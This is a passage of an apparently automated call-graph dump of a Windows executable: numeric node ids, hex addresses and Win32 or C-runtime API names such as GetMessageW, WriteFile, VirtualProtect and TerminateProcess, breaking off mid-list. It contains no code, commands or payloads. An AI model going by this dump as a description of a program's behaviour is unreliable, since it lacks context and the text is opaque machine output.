108931 410ef8 LockWindowUpdate DestroyWindow GetMessageW 108931->108924 108934 410f2a 108931->108934 108933 444e81 Sleep 108933->108986 108937 445c58 TranslateMessage DispatchMessageW GetMessageW 108934->108937 108935 410ce4 108935->108924 109130 411070 10 API calls Mailbox 108935->109130 108936->108986 109134 409e5d 60 API calls 108936->109134 109135 456349 341 API calls 108936->109135 108937->108937 108939 445c88 108937->108939 108939->108924 108940 410e43 PeekMessageW 108940->108986 108941 410ea5 TranslateMessage DispatchMessageW 108941->108940 108942 444d50 TranslateAcceleratorW 108942->108940 108942->108986 108943 409e5d 60 API calls 108943->108986 108944 44581f WaitForSingleObject 108947 44583c GetExitCodeProcess CloseHandle 108944->108947 108944->108986 108946 410d13 timeGetTime 108946->108986 108982 410f95 108947->108982 108948 410e5f Sleep 108983 410e70 Mailbox 108948->108983 108949 408047 59 API calls 108949->108986 108951 445af8 Sleep 108951->108983 108953 420db6 59 API calls Mailbox 108953->108986 108955 42049f timeGetTime 108955->108983 108956 410f4e timeGetTime 109132 409e5d 60 API calls 108956->109132 108959 445b8f GetExitCodeProcess 108963 445ba5 WaitForSingleObject 108959->108963 108964 445bbb CloseHandle 108959->108964 108961 485f25 110 API calls 108961->108983 108962 40b7dd 109 API calls 108962->108983 108963->108964 108963->108986 108964->108983 108966 40b73c 314 API calls 108966->108986 108968 445874 108968->108982 108969 445078 Sleep 108969->108986 108970 445c17 Sleep 108970->108986 108976 409ea0 314 API calls 108976->108986 108979 40fce0 314 API calls 108979->108986 108982->108815 108983->108955 108983->108959 108983->108961 108983->108962 108983->108968 108983->108969 108983->108970 108983->108982 108983->108986 109159 407667 108983->109159 109164 462408 60 API calls 108983->109164 109165 409e5d 60 API calls 108983->109165 109166 407de1 108983->109166 109170 4089b3 69 API calls Mailbox 108983->109170 109171 40b73c 341 API calls 108983->109171 109172 4564da 60 API calls 108983->109172 109173 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108983->109173 109174 463c55 66 API calls Mailbox 108983->109174 108984 469e4a 89 API calls 108984->108986 108986->108929 108986->108933 108986->108935 108986->108940 108986->108941 108986->108942 108986->108943 108986->108944 108986->108946 108986->108948 108986->108949 108986->108951 108986->108953 108986->108956 108986->108966 108986->108976 108986->108979 108986->108982 108986->108983 108986->108984 108987 409c90 59 API calls Mailbox 108986->108987 108988 4082df 59 API calls 108986->108988 108989 4084c0 69 API calls 108986->108989 108990 407de1 59 API calls 108986->108990 108991 4089b3 69 API calls 108986->108991 108992 4455d5 VariantClear 108986->108992 108993 45617e 59 API calls Mailbox 108986->108993 108994 44566b VariantClear 108986->108994 108995 445419 VariantClear 108986->108995 108996 456e8f 59 API calls 108986->108996 108997 408cd4 59 API calls Mailbox 108986->108997 109073 40e6a0 108986->109073 109104 40f460 108986->109104 109124 4031ce 108986->109124 109129 40e420 341 API calls 108986->109129 109136 486018 59 API calls 108986->109136 109137 469a15 59 API calls Mailbox 108986->109137 109138 45d4f2 59 API calls 108986->109138 109139 409837 108986->109139 109157 4560ef 59 API calls 2 library calls 108986->109157 109158 408401 59 API calls 108986->109158 108987->108986 108988->108986 108989->108986 108990->108986 108991->108986 108992->108986 108993->108986 108994->108986 108995->108986 108996->108986 108997->108986 108999 43eda1 108998->108999 109002 4082f2 108998->109002 109000 43edb1 108999->109000 110358 4561a4 59 API calls 108999->110358 109003 40831c 109002->109003 109004 4085c0 59 API calls 109002->109004 109008 408339 Mailbox 109002->109008 109005 408322 109003->109005 109006 4085c0 59 API calls 109003->109006 109004->109003 109007 409c90 Mailbox 59 API calls 109005->109007 109005->109008 109006->109005 109007->109008 109008->108842 109009->108836 109010->108836 109012 409ebf 109011->109012 109033 409eed Mailbox 109011->109033 109013 420db6 Mailbox 59 API calls 109012->109013 109013->109033 109014 40b47a 109018 440055 109014->109018 109032 4409e5 109014->109032 109015 40b475 109016 408047 59 API calls 109015->109016 109029 40a057 109016->109029 109017 407667 59 API calls 109017->109033 110361 469e4a 89 API calls 4 library calls 109018->110361 109022 440064 109022->108805 109023 422d40 67 API calls __cinit 109023->109033 109024 420db6 59 API calls Mailbox 109024->109033 109027 408047 59 API calls 109027->109033 109028 456e8f 59 API calls 109028->109033 109029->108805 109030 4409d6 110363 469e4a 89 API calls 4 library calls 109030->110363 110364 469e4a 89 API calls 4 library calls 109032->110364 109033->109014 109033->109015 109033->109017 109033->109018 109033->109023 109033->109024 109033->109027 109033->109028 109033->109029 109033->109030 109034 40a55a 109033->109034 110359 40c8c0 341 API calls 2 library calls 109033->110359 110360 40b900 60 API calls Mailbox 109033->110360 110362 469e4a 89 API calls 4 library calls 109034->110362 109037 409c9b 109035->109037 109036 409cd2 109036->108842 109037->109036 110365 408cd4 59 API calls Mailbox 109037->110365 109039 409cfd 109039->108842 109040->108768 109041->108771 109042->108779 109043->108771 109044->108771 109045->108780 109046->108794 109047->108789 109048->108789 109050 4085ce 109049->109050 109054 4085f6 109049->109054 109051 4085dc 109050->109051 109052 4085c0 59 API calls 109050->109052 109053 4085e2 109051->109053 109055 4085c0 59 API calls 109051->109055 109052->109051 109053->109054 109056 409c90 Mailbox 59 API calls 109053->109056 109054->108792 109055->109053 109056->109054 109057->108836 109058->108836 109059->108836 109061 4084cb 109060->109061 109063 4084f2 109061->109063 110366 4089b3 69 API calls Mailbox 109061->110366 109063->108820 109064->108771 109065->108822 109066->108771 109068 407e62 109067->109068 109070 407e5f _memmove 109067->109070 109069 420db6 Mailbox 59 API calls 109068->109069 109069->109070 109070->108908 109071->108912 109072->108919 109074 40e6d5 109073->109074 109075 443aa9 109074->109075 109079 40e73f 109074->109079 109080 40e799 109074->109080 109076 409ea0 341 API calls 109075->109076 109077 443abe 109076->109077 109103 40e970 Mailbox 109077->109103 109176 469e4a 89 API calls 4 library calls 109077->109176 109078 407667 59 API calls 109078->109080 109079->109080 109082 407667 59 API calls 109079->109082 109080->109078 109083 422d40 __cinit 67 API calls 109080->109083 109085 443b26 109080->109085 109088 40e95a 109080->109088 109080->109103 109084 443b04 109082->109084 109083->109080 109177 422d40 109084->109177 109085->108986 109087 4084c0 69 API calls 109087->109103 109088->109103 109180 469e4a 89 API calls 4 library calls 109088->109180 109090 409ea0 341 API calls 109090->109103 109091 409c90 Mailbox 59 API calls 109091->109103 109092 469e4a 89 API calls 109092->109103 109095 408d40 59 API calls 109095->109103 109099 40f195 109184 469e4a 89 API calls 4 library calls 109099->109184 109101 443e25 109101->108986 109102 40ea78 109102->108986 109103->109087 109103->109090 109103->109091 109103->109092 109103->109095 109103->109099 109103->109102 109175 407f77 59 API calls 2 library calls 109103->109175 109181 456e8f 59 API calls 109103->109181 109182 47c5c3 341 API calls 109103->109182 109183 47b53c 341 API calls Mailbox 109103->109183 109185 4793c6 341 API calls Mailbox 109103->109185 109105 40f650 109104->109105 109106 40f4ba 109104->109106 109107 407de1 59 API calls 109105->109107 109108 40f4c6 109106->109108 109109 44441e 109106->109109 109115 40f58c Mailbox 109107->109115 109365 40f290 341 API calls 2 library calls 109108->109365 109366 47bc6b 341 API calls Mailbox 109109->109366 109112 44442c 109116 40f630 109112->109116 109367 469e4a 89 API calls 4 library calls 109112->109367 109114 40f4fd 109114->109112 109114->109115 109114->109116 109264 404e4a 109115->109264 109270 47df37 109115->109270 109273 463c37 109115->109273 109276 46cb7a 109115->109276 109356 47445a 109115->109356 109116->108986 109117 409c90 Mailbox 59 API calls 109118 40f5e3 109117->109118 109118->109116 109118->109117 109125 403212 109124->109125 109127 4031e0 109124->109127 109125->108986 109126 403205 IsDialogMessageW 109126->109125 109126->109127 109127->109125 109127->109126 109128 43cf32 GetClassLongW 109127->109128 109128->109126 109128->109127 109129->108986 109130->108926 109131->108931 109132->108986 109133->108936 109134->108936 109135->108936 109136->108986 109137->108986 109138->108986 109140 409851 109139->109140 109141 40984b 109139->109141 109142 43f5d3 __i64tow 109140->109142 109143 409899 109140->109143 109144 409857 __itow 109140->109144 109148 43f4da 109140->109148 109141->108986 110356 423698 83 API calls 3 library calls 109143->110356 109147 420db6 Mailbox 59 API calls 109144->109147 109149 409871 109147->109149 109150 420db6 Mailbox 59 API calls 109148->109150 109155 43f552 Mailbox _wcscpy 109148->109155 109149->109141 109151 407de1 59 API calls 109149->109151 109152 43f51f 109150->109152 109151->109141 109153 420db6 Mailbox 59 API calls 109152->109153 109154 43f545 109153->109154 109154->109155 109156 407de1 59 API calls 109154->109156 110357 423698 83 API calls 3 library calls 109155->110357 109156->109155 109157->108986 109158->108986 109160 420db6 Mailbox 59 API calls 109159->109160 109161 407688 109160->109161 109162 420db6 Mailbox 59 API calls 109161->109162 109163 407696 109162->109163 109163->108983 109164->108983 109165->108983 109167 407df0 __wsetenvp _memmove 109166->109167 109168 420db6 Mailbox 59 API calls 109167->109168 109169 407e2e 109168->109169 109169->108983 109170->108983 109171->108983 109172->108983 109173->108983 109174->108983 109175->109103 109176->109103 109186 422c44 109177->109186 109179 422d4b 109179->109080 109180->109103 109181->109103 109182->109103 109183->109103 109184->109101 109185->109103 109187 422c50 __write 109186->109187 109194 423217 109187->109194 109193 422c77 __write 109193->109179 109211 429c0b 109194->109211 109196 422c59 109197 422c88 DecodePointer DecodePointer 109196->109197 109198 422c65 109197->109198 109199 422cb5 109197->109199 109208 422c82 109198->109208 109199->109198 109257 4287a4 59 API calls _memcpy_s 109199->109257 109201 422d18 EncodePointer EncodePointer 109201->109198 109202 422cec 109202->109198 109206 422d06 EncodePointer 109202->109206 109259 428864 61 API calls 2 library calls 109202->109259 109203 422cc7 109203->109201 109203->109202 109258 428864 61 API calls 2 library calls 109203->109258 109206->109201 109207 422d00 109207->109198 109207->109206 109260 423220 109208->109260 109212 429c2f EnterCriticalSection 109211->109212 109213 429c1c 109211->109213 109212->109196 109218 429c93 109213->109218 109215 429c22 109215->109212 109242 4230b5 58 API calls 3 library calls 109215->109242 109219 429c9f __write 109218->109219 109220 429cc0 109219->109220 109221 429ca8 109219->109221 109224 429ce1 __write 109220->109224 109246 42881d 58 API calls __malloc_crt 109220->109246 109243 42a16b 58 API calls __NMSG_WRITE 109221->109243 109224->109215 109225 429cad 109244 42a1c8 58 API calls 7 library calls 109225->109244 109227 429cd5 109229 429ceb 109227->109229 109230 429cdc 109227->109230 109228 429cb4 109245 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109228->109245 109233 429c0b __lock 58 API calls 109229->109233 109247 428b28 58 API calls __getptd_noexit 109230->109247 109235 429cf2 109233->109235 109236 429d17 109235->109236 109237 429cff 109235->109237 109249 422d55 109236->109249 109248 429e2b InitializeCriticalSectionAndSpinCount 109237->109248 109240 429d0b 109255 429d33 LeaveCriticalSection _doexit 109240->109255 109243->109225 109244->109228 109246->109227 109247->109224 109248->109240 109250 422d5e RtlFreeHeap 109249->109250 109254 422d87 _free 109249->109254 109251 422d73 109250->109251 109250->109254 109256 428b28 58 API calls __getptd_noexit 109251->109256 109253 422d79 GetLastError 109253->109254 109254->109240 109255->109224 109256->109253 109257->109203 109258->109202 109259->109207 109263 429d75 LeaveCriticalSection 109260->109263 109262 422c87 109262->109193 109263->109262 109265 404e54 109264->109265 109266 404e5b 109264->109266 109368 4253a6 109265->109368 109268 404e6a 109266->109268 109269 404e7b FreeLibrary 109266->109269 109268->109118 109269->109268 109638 47cadd 109270->109638 109272 47df47 109272->109118 109771 46445a GetFileAttributesW 109273->109771 109277 407667 59 API calls 109276->109277 109278 46cbaf 109277->109278 109279 407667 59 API calls 109278->109279 109280 46cbb8 109279->109280 109281 46cbcc 109280->109281 109971 409b3c 109280->109971 109283 409837 84 API calls 109281->109283 109284 46cbe9 109283->109284 109285 46cd1a Mailbox 109284->109285 109286 46ccea 109284->109286 109287 46cc0b 109284->109287 109285->109118 109775 404ddd 109286->109775 109288 409837 84 API calls 109287->109288 109290 46cc17 109288->109290 109292 408047 59 API calls 109290->109292 109295 46cc23 109292->109295 109293 404ddd 136 API calls 109296 46cd16 109293->109296 109294 407667 59 API calls 109297 46cd4b 109294->109297 109299 46cc37 109295->109299 109300 46cc69 109295->109300 109296->109285 109296->109294 109298 407667 59 API calls 109297->109298 109301 46cd54 109298->109301 109302 408047 59 API calls 109299->109302 109303 409837 84 API calls 109300->109303 109304 407667 59 API calls 109301->109304 109305 46cc47 109302->109305 109306 46cc76 109303->109306 109307 46cd5d 109304->109307 109975 407cab 109305->109975 109309 408047 59 API calls 109306->109309 109310 407667 59 API calls 109307->109310 109313 46cc82 109309->109313 109311 46cd66 109310->109311 109314 409837 84 API calls 109311->109314 109982 464a31 GetFileAttributesW 109313->109982 109318 46cd73 109314->109318 109315 409837 84 API calls 109319 46cc5d 109315->109319 109317 46cc8b 109320 46cc9e 109317->109320 109323 4079f2 59 API calls 109317->109323 109799 40459b 109318->109799 109322 407b2e 59 API calls 109319->109322 109325 409837 84 API calls 109320->109325 109331 46cca4 109320->109331 109322->109300 109323->109320 109324 46cd8e 109850 4079f2 109324->109850 109327 46cccb 109325->109327 109983 4637ef 75 API calls Mailbox 109327->109983 109330 46cdd1 109333 408047 59 API calls 109330->109333 109331->109285 109332 4079f2 59 API calls 109335 46cdae 109332->109335 109334 46cddf 109333->109334 109853 407b2e 109334->109853 109335->109330 109984 407bcc 109335->109984 109339 407b2e 59 API calls 109341 46cdfb 109339->109341 109340 46cdc3 109342 407bcc 59 API calls 109340->109342 109343 407b2e 59 API calls 109341->109343 109342->109330 109344 46ce09 109343->109344 109345 409837 84 API calls 109344->109345 109346 46ce15 109345->109346 109862 464071 109346->109862 109348 46ce26 109349 463c37 3 API calls 109348->109349 109350 46ce30 109349->109350 109351 409837 84 API calls 109350->109351 109354 46ce61 109350->109354 109352 46ce4e 109351->109352 109916 469155 109352->109916 109355 404e4a 84 API calls 109354->109355 109355->109285 109357 409837 84 API calls 109356->109357 109358 474494 109357->109358 110311 406240 109358->110311 109360 4744a4 109361 4744c9 109360->109361 109362 409ea0 341 API calls 109360->109362 109364 4744cd 109361->109364 110336 409a98 59 API calls Mailbox 109361->110336 109362->109361 109364->109118 109365->109114 109366->109112 109367->109116 109369 4253b2 __write 109368->109369 109370 4253c6 109369->109370 109371 4253de 109369->109371 109403 428b28 58 API calls __getptd_noexit 109370->109403 109377 4253d6 __write 109371->109377 109381 426c11 109371->109381 109374 4253cb 109404 428db6 9 API calls _memcpy_s 109374->109404 109377->109266 109382 426c43 EnterCriticalSection 109381->109382 109383 426c21 109381->109383 109385 4253f0 109382->109385 109383->109382 109384 426c29 109383->109384 109386 429c0b __lock 58 API calls 109384->109386 109387 42533a 109385->109387 109386->109385 109388 425349 109387->109388 109389 42535d 109387->109389 109449 428b28 58 API calls __getptd_noexit 109388->109449 109395 425359 109389->109395 109406 424a3d 109389->109406 109391 42534e 109450 428db6 9 API calls _memcpy_s 109391->109450 109405 425415 LeaveCriticalSection LeaveCriticalSection __wfsopen 109395->109405 109399 425377 109423 430a02 109399->109423 109401 42537d 109401->109395 109402 422d55 _free 58 API calls 109401->109402 109402->109395 109403->109374 109404->109377 109405->109377 109407 424a50 109406->109407 109411 424a74 109406->109411 109408 4246e6 __fclose_nolock 58 API calls 109407->109408 109407->109411 109409 424a6d 109408->109409 109451 42d886 109409->109451 109412 430b77 109411->109412 109413 425371 109412->109413 109414 430b84 109412->109414 109416 4246e6 109413->109416 109414->109413 109415 422d55 _free 58 API calls 109414->109415 109415->109413 109417 4246f0 109416->109417 109418 424705 109416->109418 109593 428b28 58 API calls __getptd_noexit 109417->109593 109418->109399 109420 4246f5 109594 428db6 9 API calls _memcpy_s 109420->109594 109422 424700 109422->109399 109424 430a0e __write 109423->109424 109425 430a32 109424->109425 109426 430a1b 109424->109426 109427 430abd 109425->109427 109430 430a42 109425->109430 109610 428af4 58 API calls __getptd_noexit 109426->109610 109615 428af4 58 API calls __getptd_noexit 109427->109615 109429 430a20 109611 428b28 58 API calls __getptd_noexit 109429->109611 109433 430a60 109430->109433 109434 430a6a 109430->109434 109612 428af4 58 API calls __getptd_noexit 109433->109612 109437 42d206 ___lock_fhandle 59 API calls 109434->109437 109435 430a65 109616 428b28 58 API calls __getptd_noexit 109435->109616 109439 430a70 109437->109439 109441 430a83 109439->109441 109442 430a8e 109439->109442 109440 430ac9 109617 428db6 9 API calls _memcpy_s 109440->109617 109595 430add 109441->109595 109613 428b28 58 API calls __getptd_noexit 109442->109613 109446 430a27 __write 109446->109401 109447 430a89 109614 430ab5 LeaveCriticalSection __unlock_fhandle 109447->109614 109449->109391 109450->109395 109452 42d892 __write 109451->109452 109453 42d8b6 109452->109453 109454 42d89f 109452->109454 109455 42d955 109453->109455 109457 42d8ca 109453->109457 109552 428af4 58 API calls __getptd_noexit 109454->109552 109558 428af4 58 API calls __getptd_noexit 109455->109558 109460 42d8f2 109457->109460 109461 42d8e8 109457->109461 109459 42d8a4 109553 428b28 58 API calls __getptd_noexit 109459->109553 109479 42d206 109460->109479 109554 428af4 58 API calls __getptd_noexit 109461->109554 109462 42d8ed 109559 428b28 58 API calls __getptd_noexit 109462->109559 109466 42d8f8 109468 42d90b 109466->109468 109469 42d91e 109466->109469 109488 42d975 109468->109488 109555 428b28 58 API calls __getptd_noexit 109469->109555 109470 42d961 109560 428db6 9 API calls _memcpy_s 109470->109560 109471 42d8ab __write 109471->109411 109475 42d917 109557 42d94d LeaveCriticalSection __unlock_fhandle 109475->109557 109476 42d923 109556 428af4 58 API calls __getptd_noexit 109476->109556 109480 42d212 __write 109479->109480 109481 42d261 EnterCriticalSection 109480->109481 109483 429c0b __lock 58 API calls 109480->109483 109482 42d287 __write 109481->109482 109482->109466 109484 42d237 109483->109484 109485 42d24f 109484->109485 109561 429e2b InitializeCriticalSectionAndSpinCount 109484->109561 109562 42d28b LeaveCriticalSection _doexit 109485->109562 109489 42d982 __write_nolock 109488->109489 109490 42d9e0 109489->109490 109491 42d9c1 109489->109491 109521 42d9b6 109489->109521 109495 42da38 109490->109495 109496 42da1c 109490->109496 109572 428af4 58 API calls __getptd_noexit 109491->109572 109494 42d9c6 109573 428b28 58 API calls __getptd_noexit 109494->109573 109499 42da51 109495->109499 109578 4318c1 60 API calls 3 library calls 109495->109578 109575 428af4 58 API calls __getptd_noexit 109496->109575 109497 42e1d6 109497->109475 109563 435c6b 109499->109563 109501 42d9cd 109574 428db6 9 API calls _memcpy_s 109501->109574 109504 42da21 109576 428b28 58 API calls __getptd_noexit 109504->109576 109506 42da5f 109508 42ddb8 109506->109508 109579 4299ac 58 API calls 2 library calls 109506->109579 109510 42ddd6 109508->109510 109511 42e14b WriteFile 109508->109511 109509 42da28 109577 428db6 9 API calls _memcpy_s 109509->109577 109514 42defa 109510->109514 109515 42ddec 109510->109515 109516 42ddab GetLastError 109511->109516 109523 42dd78 109511->109523 109517 42df05 109514->109517 109518 42dfef 109514->109518 109525 42de5b WriteFile 109515->109525 109528 42e184 109515->109528 109516->109523 109517->109528 109530 42df6a WriteFile 109517->109530 109518->109528 109535 42e064 WideCharToMultiByte 109518->109535 109519 42da8b GetConsoleMode 109519->109508 109520 42daca 109519->109520 109520->109508 109524 42dada GetConsoleCP 109520->109524 109586 42c5f6 109521->109586 109523->109521 109523->109528 109529 42ded8 109523->109529 109524->109528 109550 42db09 109524->109550 109525->109516 109526 42de98 109525->109526 109526->109515 109531 42debc 109526->109531 109527 42e1b2 109585 428af4 58 API calls __getptd_noexit 109527->109585 109528->109521 109584 428b28 58 API calls __getptd_noexit 109528->109584 109533 42dee3 109529->109533 109534 42e17b 109529->109534 109530->109516 109536 42dfb9 109530->109536 109531->109523 109581 428b28 58 API calls __getptd_noexit 109533->109581 109583 428b07 58 API calls 3 library calls 109534->109583 109535->109516 109544 42e0ab 109535->109544 109536->109517 109536->109523 109536->109531 109539 42e0b3 WriteFile 109542 42e106 GetLastError 109539->109542 109539->109544 109540 42dee8 109582 428af4 58 API calls __getptd_noexit 109540->109582 109542->109544 109544->109518 109544->109523 109544->109531 109544->109539 109545 4362ba 60 API calls __write_nolock 109545->109550 109546 437a5e WriteConsoleW CreateFileW __putwch_nolock 109549 42dc5f 109546->109549 109547 42dbf2 WideCharToMultiByte 109547->109523 109548 42dc2d WriteFile 109547->109548 109548->109516 109548->109549 109549->109516 109549->109523 109549->109546 109549->109550 109551 42dc87 WriteFile 109549->109551 109550->109523 109550->109545 109550->109547 109550->109549 109580 4235f5 58 API calls __isleadbyte_l 109550->109580 109551->109516 109551->109549 109552->109459 109553->109471 109554->109462 109555->109476 109556->109475 109557->109471 109558->109462 109559->109470 109560->109471 109561->109485 109562->109481 109564 435c76 109563->109564 109566 435c83 109563->109566 109565 428b28 _memcpy_s 58 API calls 109564->109565 109569 435c7b 109565->109569 109567 435c8f 109566->109567 109568 428b28 _memcpy_s 58 API calls 109566->109568 109567->109506 109570 435cb0 109568->109570 109569->109506 109571 428db6 _memcpy_s 9 API calls 109570->109571 109571->109569 109572->109494 109573->109501 109574->109521 109575->109504 109576->109509 109577->109521 109578->109499 109579->109519 109580->109550 109581->109540 109582->109521 109583->109521 109584->109527 109585->109521 109587 42c600 IsProcessorFeaturePresent 109586->109587 109588 42c5fe 109586->109588 109590 43590a 109587->109590 109588->109497 109591 4358b9 ___raise_securityfailure 5 API calls 109590->109591 109592 4359ed 109591->109592 109592->109497 109593->109420 109594->109422 109618 42d4c3 109595->109618 109597 430b41 109631 42d43d 59 API calls 2 library calls 109597->109631 109599 430aeb 109599->109597 109600 42d4c3 __close_nolock 58 API calls 109599->109600 109609 430b1f 109599->109609 109605 430b16 109600->109605 109601 42d4c3 __close_nolock 58 API calls 109602 430b2b CloseHandle 109601->109602 109602->109597 109606 430b37 GetLastError 109602->109606 109603 430b6b 109603->109447 109604 430b49 109604->109603 109632 428b07 58 API calls 3 library calls 109604->109632 109608 42d4c3 __close_nolock 58 API calls 109605->109608 109606->109597 109608->109609 109609->109597 109609->109601 109610->109429 109611->109446 109612->109435 109613->109447 109614->109446 109615->109435 109616->109440 109617->109446 109619 42d4e3 109618->109619 109620 42d4ce 109618->109620 109626 42d508 109619->109626 109635 428af4 58 API calls __getptd_noexit 109619->109635 109633 428af4 58 API calls __getptd_noexit 109620->109633 109622 42d4d3 109634 428b28 58 API calls __getptd_noexit 109622->109634 109624 42d512 109636 428b28 58 API calls __getptd_noexit 109624->109636 109626->109599 109628 42d4db 109628->109599 109629 42d51a 109637 428db6 9 API calls _memcpy_s 109629->109637 109631->109604 109632->109603 109633->109622 109634->109628 109635->109624 109636->109629 109637->109628 109639 409837 84 API calls 109638->109639 109640 47cb1a 109639->109640 109663 47cb61 Mailbox 109640->109663 109676 47d7a5 109640->109676 109642 47cdb9 109643 47cf2e 109642->109643 109647 47cdc7 109642->109647 109725 47d8c8 92 API calls Mailbox 109643->109725 109646 47cf3d 109646->109647 109648 47cf49 109646->109648 109689 47c96e 109647->109689 109648->109663 109649 409837 84 API calls 109664 47cbb2 Mailbox 109649->109664 109654 47ce00 109704 420c08 109654->109704 109657 47ce33 109711 4092ce 109657->109711 109658 47ce1a 109710 469e4a 89 API calls 4 library calls 109658->109710 109661 47ce25 GetCurrentProcess TerminateProcess 109661->109657 109663->109272 109664->109642 109664->109649 109664->109663 109708 47fbce 59 API calls 2 library calls 109664->109708 109709 47cfdf 61 API calls 2 library calls 109664->109709 109668 47cfa4 109668->109663 109671 47cfb8 FreeLibrary 109668->109671 109669 47ce6b 109723 47d649 107 API calls _free 109669->109723 109671->109663 109674 409d3c 60 API calls 109675 47ce7c 109674->109675 109675->109668 109675->109674 109724 408d40 59 API calls Mailbox 109675->109724 109726 47d649 107 API calls _free 109675->109726 109677 407e4f 59 API calls 109676->109677 109678 47d7c0 CharLowerBuffW 109677->109678 109727 45f167 109678->109727 109682 407667 59 API calls 109683 47d7f9 109682->109683 109734 40784b 109683->109734 109685 47d858 Mailbox 109685->109664 109686 47d810 109747 407d2c 109686->109747 109688 47d81c Mailbox 109688->109685 109751 47cfdf 61 API calls 2 library calls 109688->109751 109690 47c989 109689->109690 109694 47c9de 109689->109694 109691 420db6 Mailbox 59 API calls 109690->109691 109692 47c9ab 109691->109692 109693 420db6 Mailbox 59 API calls 109692->109693 109692->109694 109693->109692 109695 47da50 109694->109695 109696 47dc79 Mailbox 109695->109696 109703 47da73 _strcat _wcscpy __wsetenvp 109695->109703 109696->109654 109697 409b98 59 API calls 109697->109703 109698 409be6 59 API calls 109698->109703 109699 409b3c 59 API calls 109699->109703 109700 409837 84 API calls 109700->109703 109701 42571c 58 API calls __malloc_crt 109701->109703 109703->109696 109703->109697 109703->109698 109703->109699 109703->109700 109703->109701 109761 465887 61 API calls 2 library calls 109703->109761 109706 420c1d 109704->109706 109705 420cb5 VirtualProtect 109707 420c83 109705->109707 109706->109705 109706->109707 109707->109657 109707->109658 109708->109664 109709->109664 109710->109661 109712 4092d6 109711->109712 109713 420db6 Mailbox 59 API calls 109712->109713 109714 4092e4 109713->109714 109715 4092f0 109714->109715 109762 4091fc 59 API calls Mailbox 109714->109762 109717 409050 109715->109717 109763 409160 109717->109763 109719 40905f 109720 420db6 Mailbox 59 API calls 109719->109720 109721 4090fb 109719->109721 109720->109721 109721->109675 109722 408d40 59 API calls Mailbox 109721->109722 109722->109669 109723->109675 109724->109675 109725->109646 109726->109675 109729 45f192 __wsetenvp 109727->109729 109728 45f1d1 109728->109682 109728->109688 109729->109728 109730 45f278 109729->109730 109733 45f1c7 109729->109733 109730->109728 109753 4078c4 61 API calls 109730->109753 109733->109728 109752 4078c4 61 API calls 109733->109752 109735 4078b7 109734->109735 109736 40785a 109734->109736 109737 407d2c 59 API calls 109735->109737 109736->109735 109738 407865 109736->109738 109744 407888 _memmove 109737->109744 109739 407880 109738->109739 109740 43eb09 109738->109740 109754 407f27 109739->109754 109758 408029 109740->109758 109743 43eb13 109745 420db6 Mailbox 59 API calls 109743->109745 109744->109686 109746 43eb33 109745->109746 109748 407d3a 109747->109748 109750 407d43 _memmove 109747->109750 109749 407e4f 59 API calls 109748->109749 109748->109750 109749->109750 109750->109688 109751->109685 109752->109733 109753->109730 109756 407f3f 109754->109756 109757 407f39 109754->109757 109755 420db6 Mailbox 59 API calls 109755->109757 109756->109755 109757->109744 109759 420db6 Mailbox 59 API calls 109758->109759 109760 408033 109759->109760 109760->109743 109761->109703 109762->109715 109764 409169 Mailbox 109763->109764 109765 43f19f 109764->109765 109770 409173 109764->109770 109766 420db6 Mailbox 59 API calls 109765->109766 109768 43f1ab 109766->109768 109767 40917a 109767->109719 109769 409c90 Mailbox 59 API calls 109769->109770 109770->109767 109770->109769 109772 463c3e 109771->109772 109773 464475 FindFirstFileW 109771->109773 109772->109118 109773->109772 109774 46448a FindClose 109773->109774 109774->109772 109993 404bb5 109775->109993 109780 43d8e6 109783 404e4a 84 API calls 109780->109783 109781 404e08 LoadLibraryExW 110003 404b6a 109781->110003 109785 43d8ed 109783->109785 109787 404b6a 3 API calls 109785->109787 109788 43d8f5 109787->109788 110029 404f0b 109788->110029 109789 404e2f 109789->109788 109790 404e3b 109789->109790 109792 404e4a 84 API calls 109790->109792 109794 404e40 109792->109794 109794->109293 109794->109296 109796 43d91c 110037 404ec7 109796->110037 109800 407667 59 API calls 109799->109800 109801 4045b1 109800->109801 109802 407667 59 API calls 109801->109802 109803 4045b9 109802->109803 109804 407667 59 API calls 109803->109804 109805 4045c1 109804->109805 109806 407667 59 API calls 109805->109806 109807 4045c9 109806->109807 109808 43d4d2 109807->109808 109809 4045fd 109807->109809 109810 408047 59 API calls 109808->109810 109811 40784b 59 API calls 109809->109811 109812 43d4db 109810->109812 109813 40460b 109811->109813 110206 407d8c 109812->110206 109815 407d2c 59 API calls 109813->109815 109817 404615 109815->109817 109816 404640 109819 404680 109816->109819 109821 40465f 109816->109821 109832 43d4fb 109816->109832 109817->109816 109818 40784b 59 API calls 109817->109818 109822 404636 109818->109822 109820 40784b 59 API calls 109819->109820 109823 404691 109820->109823 109826 4079f2 59 API calls 109821->109826 109825 407d2c 59 API calls 109822->109825 109827 4046a3 109823->109827 109830 408047 59 API calls 109823->109830 109824 43d5cb 109828 407bcc 59 API calls 109824->109828 109825->109816 109829 404669 109826->109829 109831 4046b3 109827->109831 109834 408047 59 API calls 109827->109834 109845 43d588 109828->109845 109829->109819 109833 40784b 59 API calls 109829->109833 109830->109827 109836 4046ba 109831->109836 109837 408047 59 API calls 109831->109837 109832->109824 109835 43d5b4 109832->109835 109844 43d532 109832->109844 109833->109819 109834->109831 109835->109824 109840 43d59f 109835->109840 109838 408047 59 API calls 109836->109838 109847 4046c1 Mailbox 109836->109847 109837->109836 109838->109847 109839 4079f2 59 API calls 109839->109845 109842 407bcc 59 API calls 109840->109842 109841 43d590 109843 407bcc 59 API calls 109841->109843 109842->109845 109843->109845 109844->109841 109848 43d57b 109844->109848 109845->109819 109845->109839 110210 407924 59 API calls 2 library calls 109845->110210 109847->109324 109849 407bcc 59 API calls 109848->109849 109849->109845 109851 407e4f 59 API calls 109850->109851 109852 4079fd 109851->109852 109852->109330 109852->109332 109854 407b40 109853->109854 109855 43ec6b 109853->109855 110211 407a51 109854->110211 110217 457bdb 59 API calls _memmove 109855->110217 109858 407b4c 109858->109339 109859 43ec75 109860 408047 59 API calls 109859->109860 109861 43ec7d Mailbox 109860->109861 109863 46408d 109862->109863 109864 464092 109863->109864 109865 4640a0 109863->109865 109866 408047 59 API calls 109864->109866 109867 407667 59 API calls 109865->109867 109868 46409b Mailbox 109866->109868 109869 4640a8 109867->109869 109868->109348 109870 407667 59 API calls 109869->109870 109871 4640b0 109870->109871 109872 407667 59 API calls 109871->109872 109873 4640bb 109872->109873 109874 407667 59 API calls 109873->109874 109875 4640c3 109874->109875 109876 407667 59 API calls 109875->109876 109877 4640cb 109876->109877 109878 407667 